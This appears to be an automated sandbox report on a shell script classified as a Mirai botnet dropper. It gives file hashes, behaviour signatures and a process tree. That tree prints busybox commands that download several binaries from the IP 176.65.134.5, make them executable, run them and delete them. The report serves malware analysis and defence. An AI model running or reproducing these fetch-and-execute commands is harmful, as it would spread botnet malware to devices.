Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    19s
  • max time network
    117s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    10/03/2025, 22:22

General

  • Target

    wget.sh

  • Size

    1KB

  • MD5

    fe3891afe068ca6fc86017361dfb753c

  • SHA1

    d631b6a4eaa99085df4260727c2c86dc82cf5428

  • SHA256

    8dcc3e92c112fb94931bd86055dc51f74a70007c058d1571a4eaec583a0852c0

  • SHA512

    810560af118bf04a2723fb177bbdf25682e3cb8b95611e15c8d83576305ea41ba11dec0d42c410fc5b287cb8a31901f9190946e957ac8deb8c0d634a42334951

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 4 IoCs
  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/wget.sh
    /tmp/wget.sh
    1⤵
    • Executes dropped EXE
    PID:712
    • /bin/busybox
      /bin/busybox wget http://176.65.134.5/jklarm -O jklarm
      2⤵
      • Writes file to tmp directory
      PID:713
    • /bin/busybox
      /bin/busybox chmod +x jklarm
      2⤵
      • File and Directory Permissions Modification
      PID:723
    • /tmp/jklarm
      ./jklarm telnet
      2⤵
        PID:725
      • /bin/busybox
        /bin/busybox rm -rf jklarm
        2⤵
          PID:728
        • /bin/busybox
          /bin/busybox wget http://176.65.134.5/jklarm5 -O jklarm5
          2⤵
          • Writes file to tmp directory
          PID:730
        • /bin/busybox
          /bin/busybox chmod +x jklarm5
          2⤵
          • File and Directory Permissions Modification
          PID:738
        • /tmp/jklarm5
          ./jklarm5 telnet
          2⤵
            PID:739
          • /bin/busybox
            /bin/busybox rm -rf jklarm5
            2⤵
              PID:741
            • /bin/busybox
              /bin/busybox wget http://176.65.134.5/jklarm6 -O jklarm6
              2⤵
              • Writes file to tmp directory
              PID:743
            • /bin/busybox
              /bin/busybox chmod +x jklarm6
              2⤵
              • File and Directory Permissions Modification
              PID:749
            • /tmp/jklarm6
              ./jklarm6 telnet
              2⤵
                PID:750
              • /bin/busybox
                /bin/busybox rm -rf jklarm6
                2⤵
                  PID:753
                • /bin/busybox
                  /bin/busybox wget http://176.65.134.5/jklarm7 -O jklarm7
                  2⤵
                  • Writes file to tmp directory
                  PID:754
                • /bin/busybox
                  /bin/busybox chmod +x jklarm7
                  2⤵
                  • File and Directory Permissions Modification
                  PID:755
                • /tmp/jklarm7
                  ./jklarm7 telnet
                  2⤵
                    PID:756
                  • /bin/busybox
                    /bin/busybox rm -rf jklarm7
                    2⤵
                      PID:758
                    • /bin/busybox
                      /bin/busybox wget http://176.65.134.5/jklm68k -O jklm68k
                      2⤵
                        PID:759

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • /tmp/jklarm

                      Filesize

                      60KB

                      MD5

                      35c215d8e2b2ea03a8a191fb3723195a

                      SHA1

                      c38bcfc3d7050edeff1b7dbffd85d07348bb01e9

                      SHA256

                      c4fd68b20997f3c8a60dbadf177b3309d465f0a8bb0ad9b33b4c70ee74dc3a90

                      SHA512

                      ea5a9fda95965b6eb55c47eefe2b42a9234d13c8d05556e72e916f98a626a0a835fa7f7828d4051b6056d639b06bec0136afa9ac3157736702b94c0ed9effdf8

                    • /tmp/jklarm5

                      Filesize

                      60KB

                      MD5

                      a04040c769cad786555e183ba8ae0ca0

                      SHA1

                      a89d6b50a8140dddce29595c64949214e65c84f1

                      SHA256

                      7568e9e64ac1105cdcae20095154214ee943b2edc6c01e6d4b4eb0b7e06255a3

                      SHA512

                      e152f552b99683b3bf9b9fee2f7d34027a291e02dd2f912620593e714774cfe07e14aa837cdb2f2a300d35b721dfd67e7012955e24352bdad0ffecb4e61ed162

                    • /tmp/jklarm6

                      Filesize

                      69KB

                      MD5

                      9e18604aa4c5bedd6e9ea6690b751880

                      SHA1

                      c1f32fe93aa650f9920fc5bd659d23621ab034a2

                      SHA256

                      41342a887d2be09cf0165913b43a5916492e677d20429068d4829a090453ccbb

                      SHA512

                      cdafb3281bcaa5f5c1af71df8d53c2d022de72a559dfea513b41bc08c7d8fe421839cfdc51b3f93f501bb62d02924e3047208e8bce3a8768af2404f3caa767b0

                    • /tmp/jklarm7

                      Filesize

                      82KB

                      MD5

                      a9675614a267473cb83e195d9074a067

                      SHA1

                      a4d148cf841fc2b84c8bb3dd322e40f601532875

                      SHA256

                      fe4e8d464b7849a5483782d0c47e53deaf199e284badad12ed98ca79e47a79d9

                      SHA512

                      8adcc5df013328218823d3310bcc4f27f6e1e9e51de2e7ecd5521873f5ac6cc2315f9136e1599f1da4114e65eaed23449e78f9ce04062243aa8ec793086b1c28